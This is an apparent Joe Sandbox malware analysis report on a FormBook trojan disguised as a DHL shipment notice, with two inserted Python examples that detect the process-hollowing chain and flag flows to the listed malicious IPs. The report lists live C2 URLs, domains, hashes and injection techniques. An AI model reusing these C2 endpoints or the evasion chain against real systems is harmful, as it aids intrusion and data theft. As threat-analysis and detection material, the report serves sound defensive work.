Source: Yara match; file source: 00000002.00000002.322197992.0000000001100000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; file source: 00000002.00000000.256268925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; file source: 00000002.00000002.321951084.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; file source: 00000005.00000000.310303298.000000000E814000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; file source: 00000011.00000002.513829968.0000000002E30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; file source: 00000011.00000002.512812495.0000000002380000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; file source: 00000011.00000002.513722693.0000000002E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; file source: 00000001.00000002.258171974.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; file source: 00000002.00000000.254937698.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
MITRE ATT&CK Matrix, listed per tactic column (a number in front of a technique is the signature-count badge shown in the report; techniques without a number are empty cells of the matrix grid):

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
Execution: 1 Native API; 1 Shared Modules; At (Linux); At (Windows); Cron; Launchd; Scheduled Task
Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items
Privilege Escalation: 1 Access Token Manipulation; 512 Process Injection; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items
Defense Evasion: 1 Rootkit; 2 Virtualization/Sandbox Evasion; 1 Access Token Manipulation; 512 Process Injection; 1 Deobfuscate/Decode Files or Information; 3 Obfuscated Files or Information; 1 Software Packing
Credential Access: 1 Credential API Hooking; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
Discovery: 1 System Time Discovery; 151 Security Software Discovery; 2 Virtualization/Sandbox Evasion; 2 Process Discovery; 1 Remote System Discovery; 2 File and Directory Discovery; 114 System Information Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
Collection: 1 Credential API Hooking; 1 Archive Collected Data; 1 Clipboard Data; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Command and Control: 1 Encrypted Channel; 3 Ingress Tool Transfer; 3 Non-Application Layer Protocol; 13 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features
Impact: 1 System Shutdown/Reboot; Device Lockout; Delete Device Data; Data Encrypted for Impact

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
Behavior Graph ID: 626119
Sample: DHL SHIPMENT NOTIFICATION 1...
Start date: 13/05/2022
Architecture: WINDOWS
Score: 100

Start-node signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; 5 other signatures

DHL SHIPMENT NOTIFICATION 1146789443.exe (started)
  dropped file: C:\Users\user\AppData\Local\Temp\aeokw.exe, PE32
  -> aeokw.exe (started)
       signatures: Tries to detect virtualization through RDTSC time measurements
       -> aeokw.exe (started)
            signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
            -> explorer.exe (injected)
                 DNS/IP: shops.myshopify.com 23.227.38.74 (port 49775 -> 80), CLOUDFLARENETUS, Canada; www.ultrakill.xyz 3.64.163.50 (port 49777 -> 80), AMAZON-02US, United States; 3 other IPs or domains
                 signatures: System process connects to network (likely due to code injection or exploit); Performs DNS queries to domains with low reputation
                 -> svchost.exe (started)
                      signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
                      -> cmd.exe (started)
                           -> conhost.exe (started)
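The chain in the behavior graph (aeokw.exe hollows into explorer.exe, the hollowed explorer.exe talks to the C2 domains and starts svchost.exe, which starts cmd.exe) is the part a detection engineer would want to catch on an endpoint. The following is an added example, not part of the Joe Sandbox report: a small rule pass over process-creation and network-connection events shaped like Sysmon Event ID 1 and 3. The event records, PIDs, field names and the allowlist are constructed for the example (the allowlist reuses the domains the sandbox excluded from analysis); the assumption that svchost.exe is normally started by services.exe is a general Windows baseline, not something the report states.

```python
from dataclasses import dataclass
from ipaddress import ip_address


@dataclass(frozen=True)
class ProcEvent:
    """Subset of a Sysmon Event ID 1 (process create) record."""
    pid: int
    image: str
    parent_pid: int
    parent_image: str


@dataclass(frozen=True)
class NetEvent:
    """Subset of a Sysmon Event ID 3 (network connect) record."""
    pid: int
    image: str
    dest_ip: str
    dest_port: int
    dest_host: str


@dataclass(frozen=True)
class Finding:
    rule: str
    pid: int
    detail: str


# Baseline assumptions for a Windows 10 host (not taken from the report).
EXPECTED_PARENT = {"svchost.exe": {"services.exe"}}
ABNORMAL_SHELL_PARENTS = {"svchost.exe"}        # schtasks-launched shells would need an exclusion in production
SHELLS = {"cmd.exe", "powershell.exe"}
# Domains the sandbox excluded from analysis (from the report's cookbook comments),
# used here as a stand-in for an organisation's egress allowlist.
ALLOWED_HOSTS = {"fs.microsoft.com", "store-images.s-microsoft.com", "login.live.com",
                 "img-prod-cms-rt-microsoft-com.akamaized.net", "arc.msn.com"}


def detect(procs, nets, allowed_hosts=ALLOWED_HOSTS):
    """Return findings for the parent/child and network anomalies the behavior graph shows."""
    findings = []
    for p in procs:
        img, parent = p.image.lower(), p.parent_image.lower()
        if img in EXPECTED_PARENT and parent not in EXPECTED_PARENT[img]:
            findings.append(Finding("unexpected_parent", p.pid, f"{img} spawned by {parent}"))
        if img in SHELLS and parent in ABNORMAL_SHELL_PARENTS:
            findings.append(Finding("shell_from_system_process", p.pid, f"{img} spawned by {parent}"))
        if img == parent:
            findings.append(Finding("self_spawn", p.pid, f"{img} re-launched itself (unpacker / hollowing step)"))
    for n in nets:
        # explorer.exe reaching a public host outside the allowlist matches the report's
        # "System process connects to network" signature; private ranges (SMB shares) are ignored.
        if (n.image.lower() == "explorer.exe" and ip_address(n.dest_ip).is_global
                and n.dest_host.lower() not in allowed_hosts):
            findings.append(Finding("system_process_network", n.pid,
                                    f"explorer.exe -> {n.dest_host} ({n.dest_ip}:{n.dest_port})"))
    return findings


def findings_by_rule(findings):
    out = {}
    for f in findings:
        out.setdefault(f.rule, []).append(f)
    return out


# Constructed events mirroring the behavior graph; PIDs are invented.
SAMPLE_PROCS = [
    ProcEvent(4000, "explorer.exe", 600, "userinit.exe"),                  # normal desktop shell
    ProcEvent(4100, "DHL SHIPMENT NOTIFICATION 1146789443.exe", 4000, "explorer.exe"),  # user launch
    ProcEvent(4200, "aeokw.exe", 4100, "DHL SHIPMENT NOTIFICATION 1146789443.exe"),
    ProcEvent(4300, "aeokw.exe", 4200, "aeokw.exe"),
    ProcEvent(4400, "svchost.exe", 4000, "explorer.exe"),                  # hollowed explorer spawns svchost
    ProcEvent(4500, "cmd.exe", 4400, "svchost.exe"),
    ProcEvent(4600, "conhost.exe", 4500, "cmd.exe"),
    ProcEvent(900, "svchost.exe", 700, "services.exe"),                    # benign svchost
]
SAMPLE_NETS = [
    NetEvent(4000, "explorer.exe", "23.227.38.74", 80, "shops.myshopify.com"),
    NetEvent(4000, "explorer.exe", "3.64.163.50", 80, "www.ultrakill.xyz"),
    NetEvent(4000, "explorer.exe", "142.250.185.115", 80, "ghs.google.com"),
    NetEvent(900, "svchost.exe", "203.0.113.10", 443, "fs.microsoft.com"),  # constructed TEST-NET address
]

if __name__ == "__main__":
    for rule, hits in findings_by_rule(detect(SAMPLE_PROCS, SAMPLE_NETS)).items():
        for h in hits:
            print(f"{rule:26} pid={h.pid:<5} {h.detail}")
```

The user double-clicking the lure (explorer.exe starting the DHL executable) is deliberately not flagged; what stands out is the same explorer.exe PID later appearing as the parent of svchost.exe and as the source of outbound HTTP, which is exactly the combination the graph records for the injected process.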

Source | Detection | Scanner | Label | Link
DHL SHIPMENT NOTIFICATION 1146789443.exe | 43% | Virustotal | | Browse
DHL SHIPMENT NOTIFICATION 1146789443.exe | 49% | ReversingLabs | Win32.Trojan.FormBook |
DHL SHIPMENT NOTIFICATION 1146789443.exe | 100% | Joe Sandbox ML | |

No Antivirus matches

Source | Detection | Scanner | Label | Link | Download
2.0.aeokw.exe.400000.8.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen | | Download File
1.2.aeokw.exe.12a0000.1.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen | | Download File
2.0.aeokw.exe.400000.6.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen | | Download File
2.0.aeokw.exe.400000.4.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen | | Download File
2.2.aeokw.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen | | Download File

No Antivirus matches

Source | Detection | Scanner | Label | Link
http://www.ultrakill.xyz/amdf/?oTsXW=bHtTbh8HU&9rF=2pnwrPnaayjLTa+dMDr3ioSS0RS/WyH1Gjote8OZi1oxTz0HZpyyfRSy0TFJ31yfLnqh | 0% | Avira URL Cloud | safe |
http://www.keilaniclothing.com/amdf/?9rF=/oFEaKse3b+9bUwDmBZBOOdpMJRIltPBO/GIVMmFEKpLcaQ5ll8yuFZgv1Udvzfmdn1m&oTsXW=bHtTbh8HU | 0% | Avira URL Cloud | safe |
http://www.ultrakill.xyz/ | 0% | Avira URL Cloud | safe |
http://www.rtpholywin99.com/amdf/?oTsXW=bHtTbh8HU&9rF=Trmpqgljk9XuX6wxdqqXIm/y+wmhK8tfRywx+ln+mTz4pafXVdYl+/2RwiFK/8XcMfBx | 100% | Avira URL Cloud | malware |
www.lgf7.com/amdf/ | 100% | Avira URL Cloud | malware |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
ghs.google.com | 142.250.185.115 | true | false | | high
www.ultrakill.xyz | 3.64.163.50 | true | true | | unknown
shops.myshopify.com | 23.227.38.74 | true | true | | unknown
www.rtpholywin99.com | unknown | unknown | true | | unknown
www.keilaniclothing.com | unknown | unknown | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://www.ultrakill.xyz/amdf/?oTsXW=bHtTbh8HU&9rF=2pnwrPnaayjLTa+dMDr3ioSS0RS/WyH1Gjote8OZi1oxTz0HZpyyfRSy0TFJ31yfLnqh | true | Avira URL Cloud: safe | unknown
http://www.keilaniclothing.com/amdf/?9rF=/oFEaKse3b+9bUwDmBZBOOdpMJRIltPBO/GIVMmFEKpLcaQ5ll8yuFZgv1Udvzfmdn1m&oTsXW=bHtTbh8HU | true | Avira URL Cloud: safe | unknown
http://www.rtpholywin99.com/amdf/?oTsXW=bHtTbh8HU&9rF=Trmpqgljk9XuX6wxdqqXIm/y+wmhK8tfRywx+ln+mTz4pafXVdYl+/2RwiFK/8XcMfBx | false | Avira URL Cloud: malware | unknown
www.lgf7.com/amdf/ | true | Avira URL Cloud: malware | low

Name | Source | Malicious | Antivirus Detection | Reputation
http://www.ultrakill.xyz/ | svchost.exe, 00000011.00000002.515898561.0000000003A1F000.00000004.10000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://nsis.sf.net/NSIS_ErrorError | DHL SHIPMENT NOTIFICATION 1146789443.exe | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
23.227.38.74 | shops.myshopify.com | Canada | 13335 | CLOUDFLARENETUS | true
3.64.163.50 | www.ultrakill.xyz | United States | 16509 | AMAZON-02US | true
142.250.185.115 | ghs.google.com | United States | 15169 | GOOGLEUS | false
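The IP table above and the per-packet list printed further down under the network section are the two artefacts an analyst would join: the packet list gives timestamps and port pairs, the IP table says which server side the sandbox considers malicious. The following is an added example, not part of the Joe Sandbox report: it rebuilds TCP conversations from packet lines in the report's column order (Timestamp, Source Port, Dest Port, Source IP, Dest IP) and marks the flows whose server is in the malicious set. The packet lines are the first 21 entries of the report's packet list, re-delimited with " | " for parsing; the malicious-IP set is the two addresses the IP table marks Malicious = true. The client/server heuristic (the endpoint with the lower port number is the server) and the fixed time origin are assumptions of the example.

```python
import re
from dataclasses import dataclass
from datetime import datetime

# Packet lines copied from the report's packet list, columns in the report's order.
PACKET_LINES = """\
May 13, 2022 16:10:37.252978086 CEST | 49773 | 80 | 192.168.2.4 | 142.250.185.115
May 13, 2022 16:10:37.269717932 CEST | 80 | 49773 | 142.250.185.115 | 192.168.2.4
May 13, 2022 16:10:37.269814014 CEST | 49773 | 80 | 192.168.2.4 | 142.250.185.115
May 13, 2022 16:10:37.269937038 CEST | 49773 | 80 | 192.168.2.4 | 142.250.185.115
May 13, 2022 16:10:37.286659002 CEST | 80 | 49773 | 142.250.185.115 | 192.168.2.4
May 13, 2022 16:10:37.426731110 CEST | 80 | 49773 | 142.250.185.115 | 192.168.2.4
May 13, 2022 16:10:37.426786900 CEST | 80 | 49773 | 142.250.185.115 | 192.168.2.4
May 13, 2022 16:10:37.426815987 CEST | 80 | 49773 | 142.250.185.115 | 192.168.2.4
May 13, 2022 16:10:37.426949978 CEST | 49773 | 80 | 192.168.2.4 | 142.250.185.115
May 13, 2022 16:10:37.427006960 CEST | 49773 | 80 | 192.168.2.4 | 142.250.185.115
May 13, 2022 16:10:37.428131104 CEST | 80 | 49773 | 142.250.185.115 | 192.168.2.4
May 13, 2022 16:10:37.428225040 CEST | 80 | 49773 | 142.250.185.115 | 192.168.2.4
May 13, 2022 16:10:37.428282976 CEST | 49773 | 80 | 192.168.2.4 | 142.250.185.115
May 13, 2022 16:10:37.428313971 CEST | 49773 | 80 | 192.168.2.4 | 142.250.185.115
May 13, 2022 16:10:57.716248035 CEST | 49775 | 80 | 192.168.2.4 | 23.227.38.74
May 13, 2022 16:10:57.733297110 CEST | 80 | 49775 | 23.227.38.74 | 192.168.2.4
May 13, 2022 16:10:57.733407974 CEST | 49775 | 80 | 192.168.2.4 | 23.227.38.74
May 13, 2022 16:10:57.733571053 CEST | 49775 | 80 | 192.168.2.4 | 23.227.38.74
May 13, 2022 16:10:57.750320911 CEST | 80 | 49775 | 23.227.38.74 | 192.168.2.4
May 13, 2022 16:10:57.795728922 CEST | 80 | 49775 | 23.227.38.74 | 192.168.2.4
May 13, 2022 16:10:57.795795918 CEST | 80 | 49775 | 23.227.38.74 | 192.168.2.4
"""

# Server-side addresses the report's IP table marks Malicious = true.
MALICIOUS_IPS = {"23.227.38.74", "3.64.163.50"}

# Report timestamp shape: "May 13, 2022 16:10:37.252978086 CEST" (nanoseconds, zone label).
_TS = re.compile(r"^(\w{3} \d{1,2}, \d{4} \d\d:\d\d:\d\d)\.(\d{9}) [A-Z]+$")
_REF = datetime(2022, 1, 1)   # arbitrary fixed origin; only differences between packets matter


def rel_seconds(ts_text):
    """Seconds since _REF with nanosecond fraction; the zone label is ignored (assumed constant)."""
    m = _TS.match(ts_text)
    if m is None:
        raise ValueError(f"unrecognised timestamp: {ts_text!r}")
    base = datetime.strptime(m.group(1), "%b %d, %Y %H:%M:%S")
    return (base - _REF).total_seconds() + int(m.group(2)) / 1e9


@dataclass
class Flow:
    client: str
    client_port: int
    server: str
    server_port: int
    first_seen: float
    last_seen: float
    to_server: int = 0
    to_client: int = 0
    malicious: bool = False

    @property
    def duration(self):
        return self.last_seen - self.first_seen


def build_flows(lines, malicious_ips):
    """Group packets into conversations keyed by (client, client port, server, server port)."""
    flows = {}
    for raw in lines.strip().splitlines():
        ts_text, sport, dport, src, dst = (c.strip() for c in raw.split("|"))
        sport, dport = int(sport), int(dport)
        t = rel_seconds(ts_text)
        if dport < sport:               # lower port is the server side: client -> server packet
            key, to_server = (src, sport, dst, dport), True
        else:                           # server -> client packet
            key, to_server = (dst, dport, src, sport), False
        flow = flows.get(key)
        if flow is None:
            flow = Flow(*key, first_seen=t, last_seen=t, malicious=key[2] in malicious_ips)
            flows[key] = flow
        flow.last_seen = max(flow.last_seen, t)
        if to_server:
            flow.to_server += 1
        else:
            flow.to_client += 1
    return sorted(flows.values(), key=lambda f: f.first_seen)


if __name__ == "__main__":
    for f in build_flows(PACKET_LINES, MALICIOUS_IPS):
        tag = "MALICIOUS" if f.malicious else "not flagged"
        print(f"{f.client}:{f.client_port} -> {f.server}:{f.server_port}  "
              f"{f.to_server} pkts out / {f.to_client} in, {f.duration:.3f}s  [{tag}]")
```

On these 21 packets the parser yields two conversations: 49773 to ghs.google.com:80 (7 packets each way, about 0.18 s) and, twenty seconds later, 49775 to shops.myshopify.com:80, which is the first of the flagged destinations. A production version would take the malicious set from the report's IOC export rather than a literal and would fall back to connection direction (SYN) rather than port ordering when both ports are ephemeral.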
                      Joe Sandbox Version:34.0.0 Boulder Opal
                      Analysis ID:626119
Start date and time: 13/05/2022 16:08:11 (2022-05-13 16:08:11 +02:00)
                      Joe Sandbox Product:CloudBasic
                      Overall analysis duration:0h 8m 58s
                      Hypervisor based Inspection enabled:false
                      Report type:light
                      Sample file name:DHL SHIPMENT NOTIFICATION 1146789443.exe
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 25
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:1
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • HDC enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Detection:MAL
                      Classification:mal100.troj.evad.winEXE@9/4@3/3
                      EGA Information:
                      • Successful, ratio: 100%
                      HDC Information:
                      • Successful, ratio: 59.5% (good quality ratio 54.6%)
                      • Quality average: 75.6%
                      • Quality standard deviation: 31.3%
                      HCA Information:
                      • Successful, ratio: 100%
                      • Number of executed functions: 0
                      • Number of non-executed functions: 0
                      Cookbook Comments:
                      • Found application associated with file extension: .exe
                      • Adjust boot time
                      • Enable AMSI
                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, store-images.s-microsoft.com, login.live.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
• Not all processes were analyzed; the report is missing behavior information
                      No simulations
No context
                      Process:C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):189439
                      Entropy (8bit):7.991246452644623
                      Encrypted:true
                      SSDEEP:3072:nSqfxKHsiwZNRIuqSFpjwuq/D7YfJs8N8p321SwWvM0rscdXjQ4sHnOBfoXdpz4O:nxfxAwWS39q6JsM8U1dWvo+XjZ6dpz8I
                      MD5:5C1283288CC16D3EAAFFF3A0C53CB189
                      SHA1:15804A12C0184AC1F12B053B9640326E1D865F92
                      SHA-256:321FDA60076CDB1D552492333599861F583B01A2F3774F84B3991EE58036AE4F
                      SHA-512:A7FD921DEC02CFFD94AF98CCC8964FEE343BF22DD541939685E85955AC6CC14EEAF661438DFD8B4F45B1852259C98C8BA153D322760F0D033C761B7382A32B9D
                      Malicious:false
                      Reputation:low
                      Preview:.y.oJ_.....{.:./..i.I..i..,|..-..A<...-..VK].M...,....R{._\.D....o...L....Gs.. ..S[..n~.]..?..G...t.X....I.)O..B..P,<.;=..:lj.\*(......C..?.5..>}+.]...WU....|4..a...T.".d....8G9(<.#9...X.......Q.+...%.v..d......z.-.y...<...%c"^.:...=...7..EGE.Z....._..S...2(...i.........Sm.-..A<J..-..V.].M...0....R{._\....... ^..XY..Q...J..5p..W..:.L..qPx....Z.4p.X.'Y.P,<.;=&.....w...-..[L......6q+l|.il..p...Z.;.\....".d.....Zs.#.#96.X....#.HwQU+...%.n.M..'.s}ob.-.y...<.B]%cF^.:..=..7..EG..Z..H.._...S...2(.E.i.........S..-..A<...-..VK].M...,....R{._\....... ^..XY..Q...J..5p..W..:.L..qPx....Z.4p.X.'Y.P,<.;=&.....w...-..[L......6q+l|.il..p...Z.;.\....".d....8G9(<.#9#..X....#z.wQ.+...%.n.M..'..}oz.-.y...<.B]%cF^.:..=..7..EG..Z..H.._...S...2(.E.i.........S..-..A<...-..VK].M...,....R{._\....... ^..XY..Q...J..5p..W..:.L..qPx....Z.4p.X.'Y.P,<.;=&.....w...-..[L......6q+l|.il..p...Z.;.\....".d....8G9(<.#9#..X....#z.wQ.+...%.n.M..'..}oz.-.y...<
                      Process:C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exe
                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                      Category:dropped
                      Size (bytes):80384
                      Entropy (8bit):6.294435627366989
                      Encrypted:false
                      SSDEEP:1536:GuTaC+v1M4fr0oxAomP3cX/4pi2sWjcdxpI:Pa524D1/ui5xy
                      MD5:6F70881E0183CE9F78E300CF2C8DC48E
                      SHA1:D2D766CB5654AA367682C41FBC177A146D047D2C
                      SHA-256:D3AFB887DFF82AA5A52C4AD2008DAC9126B854EA2E3EFC729AB27CFAFABA39C2
                      SHA-512:6C5FE5B2A594606B26E5E4D2E05995EB39CC25C0B461AD2882503D45E7705524A6EA9A2E99CB76FB2FFFC0DD992AE1F43153C29ED3E5B98ED68F85EF74807208
                      Malicious:true
                      Reputation:low
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........w...w...w...%`..w...%^..w...%a.w......w...w..w..p....w..p.~..w..p....w..Rich.w..................PE..L...+.}b............................7.............@.......................................@..................................$.......p..................................T...............................@............................................text...U........................... ..`.rdata...N.......P..................@..@.data... 1...0......................@....rsrc........p.......*..............@..@.reloc...............,..............@..B................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):4986
                      Entropy (8bit):6.153505769820207
                      Encrypted:false
                      SSDEEP:96:2JQ3L3rEeKzJzFuuvSKQZ8LFVmhJMYLX2lGNfvw7w4Ihl4FELbgTht7:3wnthuuKKGIchJMYLX2lGSIhl4egThp
                      MD5:F10D9B65FF4DE8235C81704DF991DD2A
                      SHA1:543635DE72F333E9CF19CBA7B0DE572C33AB0E43
                      SHA-256:E9A70DEEF4CDAD4801C117EA5FAF227EFF7026ADBADF19FCC1DEA95674A8E3A0
                      SHA-512:237666835BF885924CFDF5955F6D1583269EE070C9A69EA3835C06A1C60EDDAEC8A19265CB1ED13035F44E335D161B22B0266D1F0F8855E6C0996E425699BD61
                      Malicious:false
                      Reputation:low
                      Preview:.5911.....q.....!1@..@Dv.@..@Dv...)1.v-Y111..%10.=0.A.v)..,111.v....0.=0.A.v)...111.v....0.=0.A.v)...111.v....0.=0.A.v)...111.v....A5.k.9...44v=.v.....vA..5d..v..~..v..~-.5.d..A.(".v.4.-.5.v-....%..!.d.1111.5U6.\.-0...0...0..r.0..r.0...0....'.A.y.=(.y.}%Q..2.!0..r..v9@6.v!4.-.1111.uU5T111.5U>...%...v!.....=1.....@..@Dv).v9.1lv=.Q.v9.1.~A.E.u.5..).v-.v9.1q.~9.2.v)..-..=1.G+....311..311.E1..0....311..311.91.>....311.u311.91.....Y@..@Dv..v)A111.v..v-..)1.G.v-.11.v-q.v-.v)y.v)...y611..w.v9.9...1.u>...>..v..9...1.u>...>..3.9...1.u6....0....211....00.v%.@.v..0.9.{000.v%..%1.7..!1.8.v!2111.v!..51.....q@..@Dv..v)Y111.v.v-..)1.G.v-.11.v-q.v-.v)y.v)....511..@..111.v9.9...1.u>.>..v=.9...1.u>.>..vA.9....u>.>..vEd..9...4.uF.}F..v..9...3.u>.>..6.9...1.u6.G+....111...-00.v%..I1.9.v..~I.2.H0.I0.E0.A0.=0.9.j/00.v%..%1.7..!1.8.v!2111.v!..E1.....M.v)A111.v..v-..)1.G.v-.11.v-q.v-.v)y.v)....411..w.v9.9...1.u>...>..v=.9...1.u>...>..3.9...1.u6...>...V111..]-00.v%.?0.=0.9...0
                      Process:C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):289971
                      Entropy (8bit):7.540713997849172
                      Encrypted:false
                      SSDEEP:6144:JxfxAwWS39q6JsM8U1dWvo+XjZ6dpz89BY2LZwAOuu28u:J/UQlr8sdijQD89LZwSu2J
                      MD5:CD439B40B1EE8F92D024EE3F27772BB3
                      SHA1:8276D5F64B59E97CC2A965B11634FB5CA6454548
                      SHA-256:7DF3145A379DFF6BAE9572B07B4F208AF2ECEA35457A79E3AF440C6C254E3A11
                      SHA-512:054AD8E0CC4501E02E9FDA325A0DC0C6B0807E8D7C8331D6B0D04C31BC0F7D796E6651F1F006FD8020061886E0882FB8F953A9A1C84AB0D48F8B021654D7D116
                      Malicious:false
                      Reputation:low
                      Preview:*;......,................"..k....-......L:.......;..........................................................................................................................................................................................................................................G...............7...j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                      Entropy (8bit):7.915673728517711
                      TrID:
                      • Win32 Executable (generic) a (10002005/4) 99.96%
                      • Generic Win/DOS Executable (2004/3) 0.02%
                      • DOS Executable Generic (2002/1) 0.02%
                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                      File name:DHL SHIPMENT NOTIFICATION 1146789443.exe
                      File size:278331
                      MD5:8fbdf9f70b21179d87b83fe47b2137dd
                      SHA1:146eebe16adad9486cac66f4574810cec1f56cbb
                      SHA256:972bc525f6be5f7281a72ec4887cc5b85f4b064463bba234f1258c967b164026
                      SHA512:4677bcdcaf115ff555b04d00db60fcd12a02be178a95e401bcbccf4130e347fcc315579fa72f7055f490009fcaf3bb4c14cc119432ff1b89756f6f6d5ec62abe
                      SSDEEP:6144:LOtIO6psx/OTz8giqoW/rOiY8FWB55z44pvVwVlTc7:LOL4sBOTYgjFyGcB5h9pcE
                      TLSH:A44412053A44D43BFD3722734E3766738E6E471442B94B1BB3E126257E719C2AB1EB81
                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!`G.@...@...@../OQ..@...@..I@../OS..@...c>..@..+F...@..Rich.@..........................PE..L.....Oa.................h....:....
                      Icon Hash:b2a88c96b2ca6a72
                      Entrypoint:0x403646
                      Entrypoint Section:.text
                      Digitally signed:false
                      Imagebase:0x400000
                      Subsystem:windows gui
                      Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                      DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                      Time Stamp:0x614F9AA9 [Sat Sep 25 21:54:49 2021 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:
                      OS Version Major:4
                      OS Version Minor:0
                      File Version Major:4
                      File Version Minor:0
                      Subsystem Version Major:4
                      Subsystem Version Minor:0
                      Import Hash:61259b55b8912888e90f516ca08dc514
                      Instruction
                      push ebp
                      mov ebp, esp
                      sub esp, 000003F4h
                      push ebx
                      push esi
                      push edi
                      push 00000020h
                      pop edi
                      xor ebx, ebx
                      push 00008001h
                      mov dword ptr [ebp-14h], ebx
                      mov dword ptr [ebp-04h], 0040A230h
                      mov dword ptr [ebp-10h], ebx
                      call dword ptr [004080C8h]
                      mov esi, dword ptr [004080CCh]
                      lea eax, dword ptr [ebp-00000140h]
                      push eax
                      mov dword ptr [ebp-0000012Ch], ebx
                      mov dword ptr [ebp-2Ch], ebx
                      mov dword ptr [ebp-28h], ebx
                      mov dword ptr [ebp-00000140h], 0000011Ch
                      call esi
                      test eax, eax
                      jne 00007F1EB8BBA36Ah
                      lea eax, dword ptr [ebp-00000140h]
                      mov dword ptr [ebp-00000140h], 00000114h
                      push eax
                      call esi
                      mov ax, word ptr [ebp-0000012Ch]
                      mov ecx, dword ptr [ebp-00000112h]
                      sub ax, 00000053h
                      add ecx, FFFFFFD0h
                      neg ax
                      sbb eax, eax
                      mov byte ptr [ebp-26h], 00000004h
                      not eax
                      and eax, ecx
                      mov word ptr [ebp-2Ch], ax
                      cmp dword ptr [ebp-0000013Ch], 0Ah
                      jnc 00007F1EB8BBA33Ah
                      and word ptr [ebp-00000132h], 0000h
                      mov eax, dword ptr [ebp-00000134h]
                      movzx ecx, byte ptr [ebp-00000138h]
                      mov dword ptr [007A8B58h], eax
                      xor eax, eax
                      mov ah, byte ptr [ebp-0000013Ch]
                      movzx eax, ax
                      or eax, ecx
                      xor ecx, ecx
                      mov ch, byte ptr [ebp-2Ch]
                      movzx ecx, cx
                      shl eax, 10h
                      or eax, ecx
                      Programming Language:
                      • [EXP] VC++ 6.0 SP5 build 8804
